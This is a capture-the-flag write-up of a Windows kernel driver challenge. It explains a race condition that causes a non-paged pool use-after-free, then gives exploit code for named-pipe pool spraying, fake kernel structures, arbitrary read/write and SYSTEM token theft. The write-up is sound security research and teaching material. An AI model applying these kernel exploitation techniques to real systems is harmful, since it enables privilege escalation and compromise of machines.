STAR Labs Windows Exploitation Challenge Writeup
Over the past few months, the STAR Labs team has been hosting a Windows exploitation challenge. I was lucky enough to solve it and got myself a ticket to Off-By-One conference. Here is my writeup for the challenge!
Analyzing the binary
We are given a Windows kernel driver. Basic analysis shows that it is used to receive and save messages sent from usermode.
Important structures
There are two key structures used in this driver: handle
and message entry
. Message entry
is the storage unit that saves our message from usermode, its structure is described below:
struct __declspec(align(8)) MsgEntry
_DWORD refCount;
int pad;
LIST_ENTRY listEntry; // bucket linked list
PVOID msgContent;
__int64 msgSize;
char isAddedToBucket;
The driver sorts all MsgEntry
objects into two buckets
. If a message is smaller than 0x200 bytes, it goes into the small bucket
; otherwise, it ends up in the big bucket
. Each bucket is essentially a linked list, with the heads of the big
and small
buckets located at offsets 0x3140
and 0x3150
, respectively.
A handle
acts as a wrapper around a MsgEntry
. We can select which entry to interact with based on the index
field inside the handle.
struct MsgHnd
int index;
int field_4;
MsgEntry *tmsg;
LIST_ENTRY listEntry;
All the MsgHnd
objects are also grouped together inside a linked list. The head of this list is at offset 0x30A0
Operations on message entries:
The driver exposes 4 IOCTL for working with message entries:
: Initialize a newMsgEntry
and its correspondingMsgHnd
: Remove aMsgHnd
: Write a message to aMsgEntry
: Empty a bucket.
When a MsgEntry
is in use (e.g., during a write operation or while inside a bucket), its refCount
field is incremented using the lock inc
instruction. Once it is no longer in use, the reference count is decremented. If refCount
drops to 0, the entry is freed.
Each MsgEntry
also has a mutex object. During a write operation, this mutex is locked to prevent multiple threads from modifying the entry at the same time. That should be enough to prevent race conditions… or is it?
Vulnerable code
When emptying buckets, the function fails to lock the mutex on each message entry
_int64 __fastcall emptyTmsgBucket(PIRP Irp, struct _IO_STACK_LOCATION * CurrentStackLocation) {
currentEntry = bucketHead -> Flink;
if (bucketHead -> Flink != bucketHead) {
do {
prevEntry = currentEntry -> Blink;
tmsg = & currentEntry[0xFFFFFFFF].Blink;
nextEntry = currentEntry -> Flink;
prevEntry -> Flink = currentEntry -> Flink;
nextEntry -> Blink = prevEntry; // [1]
currentEntry -> Blink = currentEntry;
currentEntry -> Flink = currentEntry;
currentEntry -> isAddedToBucket = 0;
if (_InterlockedExchangeAdd(&tmsg->refCount, 0xFFFFFFFF) == 1) {
msgContent = tmsg -> msgContent;
if (msgContent) {
ExFreePoolWithTag(msgContent, 'bufT');
ExFreePoolWithTag(tmsg, 'msgT');
currentEntry = nextEntry;
while (nextEntry != bucketHead);
At [1]
(line 11), the address of nextEntry is taken. From that point until the program loops back to [1]
in the next iteration, if nextEntry manages to switch to the other bucket, the link list will become corrupt. This causes the unlink loop to run forever, as the stop condition nextEntry != bucketHead
could never be met.
If the handle for currentEntry
has already been deleted, then currentEntry->refCount
is guaranteed to be 1, and there will be two calls to ExFreePoolWithTag
to free currentEntry
and currentEntry->msgContent
. This will make the iteration to unlink currentEntry
run a bit longer, and widen our race windows.
During testing, I noticed that if we win the race, the function enters an infinite loop on a MsgEntry
whose Flink
and Blink
both point to itself. The loop repeatedly unlinks the same entry, eventually reducing its refCount to 0 and freeing it. This leads to a use-after-free condition on the non-paged pool.
Triggering the race condition
I shape the layout of the big bucket
as follows:
Then I create 6 threads in total:
- Thread 1 calls the empty bucket IOCTL (this will be referred to as
empty thread
) - The other threads continuously move the message entries with refCount == 2 to the
small bucket
(they will be referred to asflipping threads
). They work by simply calling the write message IOCTL with msgSize > 0x200 on these entries.
DWORD WINAPI writeSmallMsgThread(LPVOID lpParameter) {
int startIndex = (int) lpParameter;
HANDLE device = raceDeviceList[startIndex];
WriteMsg * smallMsg = (WriteMsg * ) malloc(MSG_SIZE_SMALL + 0xc);
smallMsg -> msgSize = MSG_SIZE_SMALL;
for (int i = startIndex; i < FLIPPING_MSG_ENTRY_COUNT; i += FLIPPING_THREAD_COUNT) {
smallMsg -> index = flippingIndexList[i];
DeviceIoControl(device, 0x222008, smallMsg, MSG_SIZE_SMALL + 0xc, NULL, 0, NULL, NULL);
puts("[*] End write");
return 0;
Since the empty thread
usually finishes quickly, we can wait 1–2 seconds for it to complete. If it’s still running after that, it’s a clear sign that we’ve won the race.
Our exploitation strategy follows the very detailed guide from vp77, which leverages named pipes to exploit vulnerabilities in non-paged pools.
Stage 1: Reclaim the hole with fake Tmsg entry
By now the empty loop is trapped on an already freed message entry. We then reclaim the hole with unbuffered named pipe entries, which act as fake MsgEntry objects. Their content is as follows:
fakeKernelTmsg->refCount = 1;
fakeKernelTmsg->listEntry.Flink = &fakeUsermodeTmsg->listEntry;
fakeKernelTmsg->listEntry.Blink = &fakeUsermodeTmsg->listEntry;
is another fake MsgEntry
that we create on usermode:
fakeUsermodeTmsg->refCount = 0x69696969;
fakeUsermodeTmsg->listEntry.Flink = &fakeUsermodeTmsg->listEntry;
fakeUsermodeTmsg->listEntry.Blink = &fakeUsermodeTmsg->listEntry;
With refCount == 1, fakeKernelTmsg
will immediately be freed again by the empty loop. After that iteration, the empty thread will follow fakeKernelTmsg->listEntry.Flink
to our usermode entry.
has both Flink
and Blink
pointing to itself, effectively trapping the kernel thread. The kernel thread will continuously reduce the entry’s refCount, so we have to keep the refCount
above 0 to prevent a crash. To achieve this, I set the refCount
to a big enough number and have another thread maintaining it at the initial value.
DWORD WINAPI watchTmsgRefCount(LPVOID lpParameter) {
while (true) {
if (!isKernelThreadTrapped && fakeUsermodeTmsg -> refCount != USERMODE_FAKE_TMSG_REFCOUNT) {
puts("[*] Kernel loop redirected to usermode");
isKernelThreadTrapped = true;
fakeUsermodeTmsg -> refCount = USERMODE_FAKE_TMSG_REFCOUNT;
This thread also notifies us when the kernel thread gets trapped on the user-mode MsgEntry
. A dropping refCount
indicates that the kernel thread is trapped. With this setup, the empty thread loops indefinitely on a fake entry and no longer interferes with our later steps.
Stage 2: Reclaim the hole with buffered DQE
After the 1st unbuffered entry is freed by the empty thread, we spray the pool again — this time with buffered DATA_QUEUE_ENTRY
(or DQE
). These are the objects that we’re going to corrupt for arbitrary read/write:
for (int i = 0; i < NP_RECLAIM_COUNT; i++) {
WriteFile(reclaimPipeBufferedList[i].Write, pipeContent, NP_BUFFERED_HEAD_ENTRY_SIZE, NULL, 0);
However, we’ll run into a problem if we only create 1 DQE
in each pipe. The reason is that the technique from vp77
includes adding some extra DQE
later on for arbitrary write, and this is how Npfs
inserts a new entry to a data queue (code taken from reactos):
_EX_ListHead = (ListHead);
_EX_Blink = _EX_ListHead->Blink;
(Entry)->Flink = _EX_ListHead;
(Entry)->Blink = _EX_Blink;
_EX_Blink->Flink = (Entry);
_EX_ListHead->Blink = (Entry);
As you can see, to properly insert a new DQE, the last entry in the link list must be valid. So I decided to add an extra entry after the head entry on all the pipes:
for (int i = 0; i < NP_RECLAIM_COUNT; i++) {
WriteFile(reclaimPipeBufferedList[i].Write, pipeContent, NP_BUFFERED_HEAD_ENTRY_SIZE, NULL, 0);
for (int i = 0; i < NP_RECLAIM_COUNT; i++) {
WriteFile(reclaimPipeBufferedList[i].Write, pipeContent, NP_BUFFERED_TAIL_ENTRY_SIZE, NULL, 0);
These tail entries
sit at the end of the data queue linked list and remain valid throughout our exploit. Their size is chosen so that they are allocated in a different LFH bucket, in order not to mess with our head entries
At this point, we can still read data from the unbuffered pipes in stage 1. Since our old fakeKernelTmsg
has been overwritten by the new DQE, we can identify which stage 1 pipe is corrupt.
for (int i = 0; i < NP_SPRAY_COUNT; i++) {
PeekNamedPipe(reclaimPipeUnbufferedListStage1[i].Read, &stage1PipeContent, sizeof(TMsg), NULL, NULL, NULL);
// Changed data ==> corrupt pipe
if (stage1PipeContent.listEntry.Flink != & fakeUsermodeTmsg -> listEntry) {
puts("[*] Found corrupted stage 1 pipe. Leaking buffered DQE");
corruptReclaimPipe = reclaimPipeUnbufferedListStage1[i];
originalBufferedDqe = (DATA_QUEUE_ENTRY * )&stage1PipeContent;
// Since this is the 1st entry in this pipe, its Blink points to CCB
corruptPipeCCB = (NP_CCB * )(originalBufferedDqe -> Blink - offsetof(NP_CCB, DataQueueOutbound));
printf("[*] Corrupt pipe's CCB: 0x%p\n", corruptPipeCCB);
We can also leak the content of the buffered DQE and calculate the address of the stage 2 pipe’s client control block
(or CCB
Finally, we can free the object by using ReadFile
on the stage 1 pipe, leaving the stage 2 pipe pointing to a freed DQE:
ReadFile(corruptReclaimPipe.Read, pipeData, NP_UNBUFFERED_ENTRY_SIZE, NULL, NULL);
Stage 3: Spraying fake buffered DQE
For the final spray, we aim to reclaim the hole with a fake buffered DQE
We’ll use unbuffered entries for this spray, and their contents are as follows:
char stage3Content[NP_UNBUFFERED_ENTRY_SIZE];
ZeroMemory(stage3Content, NP_UNBUFFERED_ENTRY_SIZE);
DATA_QUEUE_ENTRY* fakeKernelDQE = (DATA_QUEUE_ENTRY*)stage3Content;
fakeKernelDQE->Flink = (uint64_t)g_usermodeDqe;
fakeKernelDQE->Blink = 0;
fakeKernelDQE->Irp = NULL;
fakeKernelDQE->EntryType = 0;
Notice that our fake buffered DQE has its Flink pointing to g_usermodeDqe
, which is another fake DQE we created on usermode.
Once a fake DQE
reclaims the hole, we use PeekNamedPipe
on each stage 2 pipe and search for the magic sequence KERNELMODE_FAKE_DQE_MAGIC
. This allows us to obtain the handle for the corrupted stage 2 pipe.
bool detectCorruptPipe() {
for (int i = 0; i < NP_RECLAIM_COUNT; i++) {
PeekNamedPipe(reclaimPipeBufferedList[i].Read, & leakContent, NP_BUFFERED_HEAD_ENTRY_SIZE, NULL, NULL, NULL);
if ( * (QWORD * ) leakContent == KERNELMODE_FAKE_DQE_MAGIC) {
printf("[*] Found magic sequence: 0x%llx\n", *(QWORD * ) leakContent);
g_vulnPipe = reclaimPipeBufferedList[i];
return true;
return false;
Arbitrary read & write
We already have a fake buffered DQE
with Flink pointing to a usermode DQE that we control. By modifying the IRP->SystemBuffer
field of our fake usermode DQE
, we can achieve arbitrary read. We also leaked the address of the CCB from stage 2, so by walking on the DQE linked list, we can leak the pool address of all the DQE from this corrupted pipe. With this, we now have everything needed to perform the arbitrary write technique.
The steps to achieve both arbitrary read and write are well explained in the article by vp77, so I won’t detail them here. By strictly following this guide, we can steal the token from the SYSTEM
process and get ourselves a NT AUTHORITY\SYSTEM
Huge thanks to the STAR Labs team for hosting such a fantastic challenge! I had a blast working on it and learned so much along the way.